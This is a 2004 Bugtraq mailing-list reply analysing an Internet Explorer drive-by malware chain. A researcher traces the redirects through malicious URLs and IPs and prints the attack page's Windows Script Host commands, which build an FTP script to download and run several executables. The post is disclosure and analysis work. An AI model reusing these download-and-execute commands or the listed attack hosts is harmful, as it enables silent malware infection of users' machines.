RE: Still Vulnerable in MSIE

["Thor Larholm" <thor () pivx com>]

Nothing new here, it's just one of the remaining IE vulnerabilities that
are not yet patched. If I dare allow a small product pitch, the publicly
available version of Qwik-Fix ( http://qwik-fix.net ) has protected
against threats such as this for more than half a year now, without
requiring any signature updates (since there are no need for
signatures).

This is not the first time that spyware has mixed with vulnerabilities,
exploits and worms. Spyware is increasingly becoming a corporate
liability, Robert Mitchell recently did a feature story on this at
http://www.computerworld.com/securitytopics/security/story/0,10801,92784
,00.html

The high of IE vulnerabilities on my Unpatched list was 32, right now we
are at about 12 that still have no patches. There's continuously new
research being posted to the Unpatched mailing list (
http://unpatched.pivxlabs.com ) on topics such as this spyware/worm
threat.

Anyway, back to hnc3k.com - there is obviously a lot happening on all of
these popups, and quite a number of IE exploits are being exploited. A
hint of caution, don't go to any of these pages without Qwik-Fix on your
machine, they contain malicious code which will execute on your system
if it does not have adequate protection. Another hint of caution, don't
panic if your AV labels this email as being naughty just because I
mention specific dirty words.

One of the pages that try to exploit IE vulnerabilities is at

http://65.17.207.40/framepb_1u.php

which redirects to

http://si1.default-homepage-network.com/180/180.htm?si-001

which redirects to

http://object.passthison.com/vu083003/object.cgi?si1

which uses the Object Data vulnerability to change your startpage to

http://default-homepage-network.com/start.cgi?hkcu

the parameter at the end is either HKCU or HKLM depending on what
registry branch lead you there. This serves to notify
default-homepage-network whether your machine has been compromised with
user or administrator privileges

start.cgi also opens a few popup windows with advertisements, after
which it opens the following page 

http://default-homepage-network.com/newspynotice.html

that wants to sell you a cure against spyware which hijacks your start
page - as theirs just did.

That page also secretly opens

http://object.passthison.com/vu083003/newobject1.cgi
http://69.50.139.61/hp1/hp1.htm
http://www.achtungachtung.com/0021/index.php

newobject1.cgi executes the following commands through the Windows
Script Host object:

wsh.Run('command /C echo open
downloads.default-homepage-network.com>o',false,6);
wsh.Run('command /C echo tmpacct>>o',false,6);
wsh.Run('command /C echo 12345>>o',false,6);
wsh.Run('command /C echo bin>>o',false,6);
wsh.Run('command /C echo get install2.exe>>o',false,6);
wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6);
wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
wsh.Run('command /C echo get CS4P028.exe>>o',false,6);
wsh.Run('command /C echo bye>>o',false,6);
wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o
> o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe
> > o.bat',false,6);
wsh.Run('command /C echo if exist infamous_downloader.exe
infamous_downloader.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
> > o.bat',false,6);
wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe
> > o.bat',false,6);
wsh.Run('command /C o.bat',false,6);

Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch
http://69.50.139.61/hp1/HP1.chm::/hp1.htm

framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which
uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm

Other files that are attempted to be delivered are

http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
http://validation-required.info/
http://www.popmoney.net/ip/index.php
http://www.portalone.hostance.com.com/italia.exe





Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor () pivx com
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation. 
<http://www.pivx.com/qwikfix>


-----Original Message-----
From: Greg Kujawa [mailto:greg.kujawa () diamondcellar com] 
Sent: Friday, May 14, 2004 7:37 AM
To: bugtraq () securityfocus com
Subject: Still Vulnerable in MSIE




With the latest vendor AV definitions and all of the Microsoft Security
Updates my MSIE 6 application still was vulnerable to some apparent
cross-site scripting exploit. I was hit with one of the many Agobot
variants when exiting a site detailing some IE vulnerabilities
(http://www.hnc3k.com). The site exit led to a series of pop-up and
pop-under ads. 



All of these site redirects apparently resulted in a www2.flingstone.com
site dropping in a infamous.exe file onto my computer. All the while I
saw no prompts to download or execute anything whatsoever. All I did was
close the windows that were coming up.



Just an FYI since even the latest updates on all fronts cannot ensure
peace of mind.